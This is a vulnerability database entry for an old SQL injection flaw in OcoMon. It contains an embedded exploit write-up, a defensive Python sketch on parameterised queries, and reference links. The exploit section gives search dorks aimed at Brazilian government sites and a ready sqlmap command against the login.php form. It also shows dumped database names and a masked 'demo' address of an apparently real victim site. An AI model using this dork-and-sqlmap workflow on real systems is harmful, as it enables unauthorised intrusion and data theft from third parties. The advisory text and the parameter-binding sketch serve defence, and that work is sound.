OcoMon Multiple Unspecified SQL Injection Vulnerabilities

Vulnerability ID: 1196599
Vulnerability type: SQL injection
Published: 2005-12-31
Updated: 2006-01-17
CVE ID: CVE-2005-4662
CNNVD-ID: CNNVD-200512-802
Affected platform: N/A
CVSS score: 5.0
|Vulnerability source
https://cxsecurity.com/issue/WLB-2016110106
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-802
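|Vulnerability details
OcoMon 1.20 and possibly earlier versions contain multiple SQL injection vulnerabilities. Remote attackers can execute arbitrary SQL commands via unknown attack vectors in unspecified input forms.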
|Exploit (EXP)
~ OCOMON Sql Injection Vulnerable: ~

%[JonatasFil DKR]%

- OCOMON is vulnerable to Bypass Sqli,
{https://cxsecurity.com/issue/WLB-2016080175}
- And recently discovered a method of doing sqli injection via post using sqlmap.
------------------------------------------------------
[+] Vuln Directory: /ocomon/includes/common/login.php
------------------------------------------------------

- Ok, First you have to find out if the site has the file login.php and it is vuln.

------------------------------------------------------------------------------------
[+] Dork:inurl:"ocomon" site:gov.br
[+] Dork:inurl:"ocomon" site:br
-----------------------------------------------------

- After finding a site with the system vulnerable:

-----------------------
[+] Download Sqlmap:
[+] http://sqlmap.org/
-----------------------

- and go exploit.

------------------------------------------------------------------------------------
[XPL] "sqlmap -u http://www.{site}/ocomon/includes/common/login.php --data"=login=" --dbs --random-agent"
-------------------------------------------------------------------------------------

- After that just list the tables.

-------------------------
available databases [7]:
[*] emater
[*] forum
[*] information_schema
[*] mysql
[*] ocomon_rc6
[*] phpmyadmin
[*] wordpress
---------------------------

[+] DEMO: wwXw.emaXter.pXa.goXv.bXr


~ Enjoy :D
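
As an added example (not code from OcoMon or from the write-up above), this sketch shows why a form field such as the `login` POST value must be bound as a parameter rather than concatenated into the query text. SQLite stands in for the application's database, and the table, column and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample table; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, pw_hash TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "h1"), ("bob", "h2")])
    return db

def lookup_concatenated(db, login):
    # Weak form: the submitted value becomes part of the SQL text.
    sql = "SELECT login FROM users WHERE login = '" + login + "'"
    return sorted(row[0] for row in db.execute(sql))

def lookup_bound(db, login):
    # Hardened form: length-checked, then bound as data, never parsed as SQL.
    if not isinstance(login, str) or not 1 <= len(login) <= 64:
        return []
    rows = db.execute("SELECT login FROM users WHERE login = ?", (login,))
    return sorted(row[0] for row in rows)

def structure_changed(db, value):
    # True when the value alters the concatenated query: it either breaks
    # the SQL syntax or returns rows the bound query does not.
    try:
        weak = lookup_concatenated(db, value)
    except sqlite3.Error:
        return True
    return weak != lookup_bound(db, value)

if __name__ == "__main__":
    db = make_db()
    for value in ("alice", "o'brien", "x' OR '1'='1"):  # constructed inputs
        print(repr(value), structure_changed(db, value), lookup_bound(db, value))
```

A check like `structure_changed` can serve as a regression test for each form handler once its queries have been converted to bound parameters.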
|References

Source: XF
Name: ocomon-sql-injection(23085)
Link: http://xforce.iss.net/xforce/xfdb/23085
Source: OSVDB
Name: 20751
Link: http://www.osvdb.org/20751
Source: SECUNIA
Name: 17470
Link: http://secunia.com/advisories/17470
Source: BID
Name: 15386
Link: http://www.securityfocus.com/bid/15386
Source: sourceforge.net
Link: http://sourceforge.net/project/shownotes.php?release_id=369163
Source: MISC
Link: http://sourceforge.net/project/showfiles.php?group_id=45554